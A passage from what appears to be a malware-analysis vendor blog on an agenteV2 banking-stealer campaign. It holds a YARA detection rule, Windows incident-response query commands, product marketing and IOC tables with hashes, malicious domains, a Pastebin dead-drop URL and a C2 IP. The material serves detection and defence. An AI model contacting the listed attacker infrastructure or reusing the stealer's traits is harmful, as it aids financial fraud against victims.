class=\"wp-block-list\">\n<li>Alert: Outbound TLS connections to port 8443 from non-browser processes.&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">3. YARA detection rule&nbsp;<\/h3>\n\n\n\n<p>Use&nbsp;<a href=\"https:\/\/intelligence.any.run\/analysis\/yara?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktolookup\" target=\"_blank\" rel=\"noreferrer noopener\">YARA rule search in TI Lookup<\/a>:&nbsp;&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"536\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_14-1024x536.png\" alt=\"\" class=\"wp-image-20481\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_14-1024x536.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_14-300x157.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_14-768x402.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_14-370x194.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_14-270x141.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_14-740x388.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_14.png 1510w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">YARA rule in Threat Intelligence Lookup<\/figcaption><\/figure>\n\n\n\n<p><strong>The rule:<\/strong>&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>rule Win_Stealer_AgenteV2_Nuitka { \n\nmeta: \n\ndescription = \"Core Banker Stealer Nuitka Compiled\" \n\nauthor = \"0xOlympus\" \n\nreference = \"Analise de Campanha Judicial\" \n\ndate = \"2026-03-19\" \n\nseverity = \"Critical\" \n\n\nstrings: \n\n\/\/ Nuitka Artifcats \n\n$n1 = \"NUITKA_PACKAGE_HOME\" ascii \n\n$n2 = \"__nuitka_binary_dir\" ascii \n\n\/\/ Strings from report \n\n$s1 = \"agenteV2_historico_detect.dll\" ascii wide \n\n$s2 = \"wifi_driver.exe\" ascii wide \n\n$s3 = \"reiniciar.exe\" ascii wide \n\n\/\/ C2 protocol \n\n$c2 = \"uws:\/\/\" ascii \n\ncondition: \n\nuint16(0) == 0x5A4D and (all of ($n*) and 2 of ($s*)) or ($c2) \n\n}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">4. Incident Response Checklist&nbsp;<\/h3>\n\n\n\n<p>Verify the presence of active compromise indicators:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>schtasks \/query \/tn \"RunAsAdmin_AutoUpdate\" \n\nschtasks \/query \/tn \"RunAsAdmin_Executar\" \n\nreg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" \/v MonitorSystem dir \"C:\\Program Files (x86)\\Wi-fi\\\" <\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Isolate affected host from network&nbsp;immediately&nbsp;upon&nbsp;detection;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Collect full memory dump of wifi_driver.exe and reiniciar.exe processes before&nbsp;terminating;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Hash all files in C:\\Program Files (x86)\\Wi-fi\\&nbsp;and compare against IOCs in section&nbsp;6.1;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Assume all browser-saved credentials are compromised reset all banking, email, and crypto account&nbsp;passwords;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Review outbound TLS\/8443 traffic in network logs for the past 30 days to assess exfiltration&nbsp;window;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Check browser extension integrity stealer may have&nbsp;modified&nbsp;or added extensions.&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">5.&nbsp;Threat Intelligence: TI Feeds &amp; TI Lookup&nbsp;<\/h3>\n\n\n\n<p>Proactive intelligence on this campaign and similar threats&nbsp;can be operationalized using ANY.RUN&#8217;s Threat Intelligence suite:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>ANY.RUN TI Lookup<\/strong><\/a>: Query all IOCs from this report (domains, IPs, file hashes, JA3 fingerprints) directly in TI Lookup to retrieve correlated sandbox verdicts, associated samples, C2 infrastructure mappings, and MITRE ATT&amp;CK tagging across the ANY.RUN corpus. TI Lookup returns structured, analyst-ready context including first-seen\/last-seen timestamps, related tasks, and artifact relationships \u2014 dramatically accelerating triage.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotifeedslanding\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>ANY.RUN TI Feeds<\/strong><\/a>: Subscribe to structured IOC feeds to push indicators from this campaign \u2014 and the broader Brazilian banking stealer ecosystem \u2014 directly into your SIEM, SOAR, EDR, or&nbsp;firewall. Feeds are updated continuously as new samples are analyzed in the sandbox, providing near-real-time coverage of&nbsp;emerging infrastructure and payload variants.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/intelligence.any.run\/analysis\/yara?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktolookup\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>YARA Rules in TI Feeds<\/strong><\/a>: The Win_Stealer_AgenteV2_Nuitka YARA rule (section 9.3) can be deployed via ANY.RUN&#8217;s TI infrastructure to automatically flag new samples matching the&nbsp;Nuitka&nbsp;agenteV2 pattern as they surface in the wild.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Proactive Monitoring: Use TI Lookup to&nbsp;monitor&nbsp;the Pastebin dead-drop URL (pastebin.com\/raw\/0RmxqY57) and C2 IP (38.242.246.176) for updates \u2014 if the threat actor rotates infrastructure, ANY.RUN&#8217;s correlated&nbsp;<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>sandbox&nbsp;<\/strong><\/a>data will surface the new indicators before they reach victim endpoints.&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">The Business Case for ANY.RUN Enterprise&nbsp;<\/h2>\n\n\n\n<p>Security decision-makers evaluating their defensive posture against threats like agenteV2 face three compounding problems: the attack surface is broad (any employee in Brazil is a potential victim), the time-to-fraud is measured in minutes (not days), and the attacker&#8217;s tooling actively resists the tools most organizations currently deploy. <\/p>\n\n\n\n<p>The question is not whether a more capable&nbsp;threat&nbsp;intelligence and analysis platform is needed.&nbsp;It&nbsp;is whether the cost of that platform is lower than the cost of a single successful fraud event.&nbsp;<\/p>\n\n\n\n<p>Based on the capabilities&nbsp;demonstrated&nbsp;in this campaign, the answer is unambiguous. A single successful agenteV2 infection gives an attacker live visibility into an employee&#8217;s banking session, the ability to issue commands through a remote shell, and persistence that survives the endpoint until it is explicitly cleaned. The financial exposure from a single operator-assisted fraud event,&nbsp;combined with the credential exfiltration across all browser profiles,&nbsp;will in most cases far exceed the annual cost of enterprise-grade behavioral analysis and threat intelligence.&nbsp;<\/p>\n\n\n\n<p>ANY.RUN Enterprise&nbsp;Suit&nbsp;addresses each failure mode this campaign is designed to exploit:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Before&nbsp;infection<\/strong>:&nbsp;<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">Interactive Sandbox<\/a>&nbsp;detonates suspicious email attachments,&nbsp;including password-protected PDFs, with analyst interaction in a fully instrumented Windows environment. The complete 11-stage attack chain surfaces in minutes, before any production endpoint is touched.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>During&nbsp;triage<\/strong>:&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">TI Lookup<\/a>&nbsp;delivers instant, correlated intelligence on every IOC in this report&nbsp;(domains, IPs, file hashes, JA3 fingerprints)&nbsp;with MITRE ATT&amp;CK mapping, first\/last seen timestamps, and linked sandbox analyses. Triage that takes an analyst hours without context takes seconds with TI Lookup.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>At scale and speed<\/strong>:&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotifeedslanding\" target=\"_blank\" rel=\"noreferrer noopener\">TI Feeds<\/a>&nbsp;push structured, continuously updated IOC streams directly into your SIEM, SOAR, EDR, and&nbsp;firewall,&nbsp;converting sandbox findings into blocking and detection rules automatically, across your entire environment, without analyst intervention per indicator.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Against evasion<\/strong>: Behavioral analysis in ANY.RUN&#8217;s sandbox is not defeated by&nbsp;Nuitka&nbsp;compilation, in-memory execution, or filename masquerading. It&nbsp;observes&nbsp;what the malware does, not what it looks like,&nbsp;making it structurally resistant to the obfuscation techniques this campaign relies on.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Against infrastructure rotation<\/strong>: The JA3 TLS fingerprint and behavioral YARA rule in this report remain valid even after the threat actor rotates their C2 IP. ANY.RUN&#8217;s TI infrastructure ensures&nbsp;these durable detection&nbsp;signals are operationalized&nbsp;immediately, not after the next campaign wave.&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>The agenteV2 operators have invested meaningfully in their tooling. The organizations they target deserve to match that investment \u2014 with a platform built for the reality of modern, operator-assisted financial fraud rather than the commodity threats of five years ago.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Conclusion&nbsp;<\/h2>\n\n\n\n<p>This campaign is a vivid reminder that phishing has outgrown its old role as a simple delivery mechanism. It now acts as a gateway to interactive, real-time financial compromise, where attackers&nbsp;don\u2019t&nbsp;just steal&nbsp;data,&nbsp;they&nbsp;participate&nbsp;in the victim\u2019s actions like an invisible co-pilot with bad intentions.&nbsp;<\/p>\n\n\n\n<p>For businesses, the risk is no longer limited to credential leakage. When malware enables live screen monitoring, remote command execution, and direct interaction with financial sessions, the impact shifts to immediate&nbsp;financial loss, operational disruption, and reputational damage. Finance teams, executives, and any employees handling sensitive transactions become prime targets.&nbsp;<\/p>\n\n\n\n<p>Defending against this class of threats requires more than static detection. Organizations need visibility into behavior, speed in investigation, and context for decision-making.&nbsp;<\/p>\n\n\n\n<p>This is where a combined approach becomes critical:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">Interactive Sandbox<\/a>&nbsp;analysis&nbsp;helps teams understand exactly how a threat behaves before it spreads.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotifeedslanding\" target=\"_blank\" rel=\"noreferrer noopener\">Threat Intelligence Feeds<\/a>&nbsp;allow proactive blocking of known malicious infrastructure.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">TI Lookup<\/a>&nbsp;provides instant context, turning isolated indicators into actionable insight.&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>Together, these capabilities transform security from reactive firefighting into controlled, informed response.&nbsp;<\/p>\n\n\n\n<p>In a landscape where attackers&nbsp;operate&nbsp;in real time, businesses must do the same.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">About ANY.RUN&nbsp;&nbsp;&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=230426&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a>, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and with greater clarity across modern enterprise environments.&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>It allows teams to safely execute suspicious files and URLs,&nbsp;observe&nbsp;real behavior in an&nbsp;<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">Interactive Sandbox<\/a>, enrich&nbsp;indicators&nbsp;with immediate context through&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">TI Lookup<\/a>, and&nbsp;monitor&nbsp;emerging malicious infrastructure using&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktotifeedslanding\" target=\"_blank\" rel=\"noreferrer noopener\">Threat Intelligence Feeds<\/a>. Together, these capabilities help reduce investigation uncertainty, accelerate triage, and limit unnecessary escalations across the&nbsp;SOC.&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>ANY.RUN is trusted by thousands of organizations worldwide and meets enterprise security and compliance expectations. It is&nbsp;<a href=\"https:\/\/any.run\/compliance\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=brazilian-banking-phishing-campaign&amp;utm_term=240426&amp;utm_content=linktocompliance\" target=\"_blank\" rel=\"noreferrer noopener\">SOC 2 Type II certified<\/a>,&nbsp;demonstrating&nbsp;its commitment to protecting customer data and&nbsp;maintaining&nbsp;strong security controls.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Indicators of Compromise<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">1. File Hashes<\/h3>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-305\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"3\"\n           data-rows=\"6\"\n           data-wpID=\"305\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:11.682242990654%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tAlgorithm                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:54.672897196262%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tHash                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:33.644859813084%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tFile                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tMD5                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t285fea57345d838916153c4d8f43ab6c                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tintimacaojudicial.eml\t\t\t(initial sample)                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tSHA1                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t8a87d63110eeb782bb621b5f3154ca80bdcf5de7                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tintimacaojudicial.eml                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tSHA256                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t5fd682cdfdf2de867be2a4bd378a2c206370c18a598975a11c99dba121e36b1b                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tintimacaojudicial.eml                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tssdeep                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t768:1wxIS5yHtOJ3GsP80Nbt0m0mxGQd5fiCJxXFAwYNBYT:KkHtbo5+mxbnVr                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"C5\"\n                    data-col-index=\"2\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tintimacaojudicial.eml                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tMD5                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t826d6350724f203b911aa6c8c4626391                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"C6\"\n                    data-col-index=\"2\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tagenteV2_historico_detect.dll\t\t\t(core stealer)                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-305'>\ntable#wpdtSimpleTable-305{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-305 td, table.wpdtSimpleTable305 th { white-space: normal !important; }\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<h3 class=\"wp-block-heading\"><br>Network IOCs<\/h3>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-306\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"4\"\n           data-rows=\"8\"\n           data-wpID=\"306\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:16.920473773266%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tIndicator                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:11.505922165821%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tType                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:14.890016920474%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tReputation                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"D1\"\n                    data-col-index=\"3\"\n                    data-row-index=\"0\"\n                    style=\" width:56.68358714044%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tRole                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\todaracani.online                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tDomain                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tMalicious                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D2\"\n                    data-col-index=\"3\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tPhishing\t\t\tgate per-victim unique tracker                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tnuevaprodeciencia.club                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tDomain                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tMalicious                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D3\"\n                    data-col-index=\"3\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tPayload\t\t\tdistribution + C2 checkin endpoint                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t69.49.241.120                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tIP                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tMalicious                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D4\"\n                    data-col-index=\"3\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tShared\t\t\tIP for both delivery domains                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t38.242.246.176                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tIP                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C5\"\n                    data-col-index=\"2\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tMalicious                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D5\"\n                    data-col-index=\"3\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tReal\t\t\tC2 server (Contabo VPS, Germany)                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tvmi3003111.contaboserver.net                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tFQDN                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            